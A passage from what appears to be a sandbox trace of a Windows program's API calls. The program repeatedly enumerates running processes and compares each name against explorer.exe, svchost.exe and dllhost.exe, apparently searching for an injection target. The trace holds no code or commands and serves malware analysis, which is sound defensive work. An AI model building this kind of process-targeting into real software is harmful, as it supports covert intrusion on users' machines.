(lpString1="definitely.exe", lpString2="explorer.exe") returned -1 [0261.768] lstrcmpiA (lpString1="definitely.exe", lpString2="svchost.exe") returned -1 [0261.768] lstrcmpiA (lpString1="definitely.exe", lpString2="dllhost.exe") returned -1 [0261.768] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0261.769] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xec [0261.769] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0261.769] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0261.769] CloseHandle (hObject=0xec) returned 1 [0261.769] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="explorer.exe") returned 1 [0261.769] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="svchost.exe") returned -1 [0261.769] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="dllhost.exe") returned 1 [0261.769] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0261.770] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xec [0261.770] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0261.770] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0261.770] CloseHandle (hObject=0xec) returned 1 [0261.770] lstrcmpiA (lpString1="whenever.exe", lpString2="explorer.exe") returned 1 [0261.770] lstrcmpiA (lpString1="whenever.exe", lpString2="svchost.exe") returned 1 [0261.770] lstrcmpiA (lpString1="whenever.exe", lpString2="dllhost.exe") returned 1 [0261.770] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0261.770] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xec [0261.770] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0261.770] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0261.770] CloseHandle (hObject=0xec) returned 1 [0261.770] lstrcmpiA (lpString1="potentially.exe", lpString2="explorer.exe") returned 1 [0261.770] lstrcmpiA (lpString1="potentially.exe", lpString2="svchost.exe") returned -1 [0261.770] lstrcmpiA (lpString1="potentially.exe", lpString2="dllhost.exe") returned 1 [0261.770] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0261.771] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xec [0261.771] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0261.771] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0261.771] CloseHandle (hObject=0xec) returned 1 [0261.771] lstrcmpiA (lpString1="seeker.exe", lpString2="explorer.exe") returned 1 [0261.771] lstrcmpiA (lpString1="seeker.exe", lpString2="svchost.exe") returned -1 [0261.771] lstrcmpiA (lpString1="seeker.exe", lpString2="dllhost.exe") returned 1 [0261.771] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0261.772] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xec [0261.772] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0261.772] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0261.772] CloseHandle (hObject=0xec) returned 1 [0261.772] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="explorer.exe") returned 1 [0261.772] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="svchost.exe") returned -1 [0261.772] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="dllhost.exe") returned 1 [0261.772] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0261.772] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xec [0261.772] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0261.772] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0261.772] CloseHandle (hObject=0xec) returned 1 [0261.772] lstrcmpiA (lpString1="birth bean.exe", lpString2="explorer.exe") returned -1 [0261.773] lstrcmpiA (lpString1="birth bean.exe", lpString2="svchost.exe") returned -1 [0261.773] lstrcmpiA (lpString1="birth bean.exe", lpString2="dllhost.exe") returned -1 [0261.773] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0261.773] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xec [0261.773] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0261.773] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0261.773] CloseHandle (hObject=0xec) returned 1 [0261.773] lstrcmpiA (lpString1="ruby.exe", lpString2="explorer.exe") returned 1 [0261.773] lstrcmpiA (lpString1="ruby.exe", lpString2="svchost.exe") returned -1 [0261.773] lstrcmpiA (lpString1="ruby.exe", lpString2="dllhost.exe") returned 1 [0261.773] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0261.774] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xec [0261.774] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0261.774] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0261.774] CloseHandle (hObject=0xec) returned 1 [0261.774] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="explorer.exe") returned 1 [0261.774] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="svchost.exe") returned 1 [0261.774] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="dllhost.exe") returned 1 [0261.774] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0261.774] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xec [0261.774] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0261.775] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0261.775] CloseHandle (hObject=0xec) returned 1 [0261.775] lstrcmpiA (lpString1="smith.exe", lpString2="explorer.exe") returned 1 [0261.775] lstrcmpiA (lpString1="smith.exe", lpString2="svchost.exe") returned -1 [0261.775] lstrcmpiA (lpString1="smith.exe", lpString2="dllhost.exe") returned 1 [0261.775] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0261.775] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xec [0261.775] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0261.775] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0261.775] CloseHandle (hObject=0xec) returned 1 [0261.775] lstrcmpiA (lpString1="spicedespite.exe", lpString2="explorer.exe") returned 1 [0261.775] lstrcmpiA (lpString1="spicedespite.exe", lpString2="svchost.exe") returned -1 [0261.775] lstrcmpiA (lpString1="spicedespite.exe", lpString2="dllhost.exe") returned 1 [0261.775] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0261.776] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xec [0261.776] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0261.776] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0261.776] CloseHandle (hObject=0xec) returned 1 [0261.776] lstrcmpiA (lpString1="wooden.exe", lpString2="explorer.exe") returned 1 [0261.776] lstrcmpiA (lpString1="wooden.exe", lpString2="svchost.exe") returned 1 [0261.776] lstrcmpiA (lpString1="wooden.exe", lpString2="dllhost.exe") returned 1 [0261.776] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0261.777] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xec [0261.777] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0261.777] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0261.777] CloseHandle (hObject=0xec) returned 1 [0261.777] lstrcmpiA (lpString1="dallasr.exe", lpString2="explorer.exe") returned -1 [0261.777] lstrcmpiA (lpString1="dallasr.exe", lpString2="svchost.exe") returned -1 [0261.777] lstrcmpiA (lpString1="dallasr.exe", lpString2="dllhost.exe") returned -1 [0261.777] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0261.777] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xec [0261.777] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0261.777] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0261.777] CloseHandle (hObject=0xec) returned 1 [0261.777] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="explorer.exe") returned -1 [0261.777] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="svchost.exe") returned -1 [0261.777] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="dllhost.exe") returned -1 [0261.777] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0261.778] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xec [0261.778] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0261.778] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0261.778] CloseHandle (hObject=0xec) returned 1 [0261.778] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="explorer.exe") returned -1 [0261.778] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="svchost.exe") returned -1 [0261.778] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="dllhost.exe") returned -1 [0261.778] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0261.779] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xec [0261.779] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0261.779] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0261.779] CloseHandle (hObject=0xec) returned 1 [0261.779] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="explorer.exe") returned 1 [0261.779] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="svchost.exe") returned -1 [0261.779] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="dllhost.exe") returned 1 [0261.779] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0261.779] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xec [0261.779] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0261.779] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0261.779] CloseHandle (hObject=0xec) returned 1 [0261.779] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="explorer.exe") returned -1 [0261.779] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="svchost.exe") returned -1 [0261.779] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="dllhost.exe") returned 1 [0261.779] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0261.780] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xec [0261.780] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0261.780] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0261.780] CloseHandle (hObject=0xec) returned 1 [0261.780] lstrcmpiA (lpString1="population openings.exe", lpString2="explorer.exe") returned 1 [0261.780] lstrcmpiA (lpString1="population openings.exe", lpString2="svchost.exe") returned -1 [0261.780] lstrcmpiA (lpString1="population openings.exe", lpString2="dllhost.exe") returned 1 [0261.780] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0261.781] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0261.781] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0261.781] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0261.781] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0261.782] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0261.782] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0261.782] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0261.782] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0261.783] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0261.783] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0261.783] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xec [0261.783] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0261.783] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0261.783] CloseHandle (hObject=0xec) returned 1 [0261.783] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0261.784] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xec [0261.784] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0261.784] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0261.784] CloseHandle (hObject=0xec) returned 1 [0261.784] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0261.784] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xec [0261.784] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0261.784] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0261.784] CloseHandle (hObject=0xec) returned 1 [0261.784] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0261.784] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0261.785] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xec [0261.785] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0261.785] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0261.785] CloseHandle (hObject=0xec) returned 1 [0261.785] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0261.786] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0261.786] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0xec [0261.786] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0261.786] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0261.786] CloseHandle (hObject=0xec) returned 1 [0261.786] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0261.787] CloseHandle (hObject=0xe8) returned 1 [0261.787] Sleep (dwMilliseconds=0x3e8) [0262.924] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0263.404] Process32First (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0263.405] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0263.405] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0263.405] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0263.405] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0263.406] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0263.406] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0263.406] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0263.406] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0263.407] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0263.407] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0263.407] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0263.407] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0263.408] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0263.408] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0263.408] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0263.408] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0263.409] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0263.409] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0263.409] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0263.409] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, 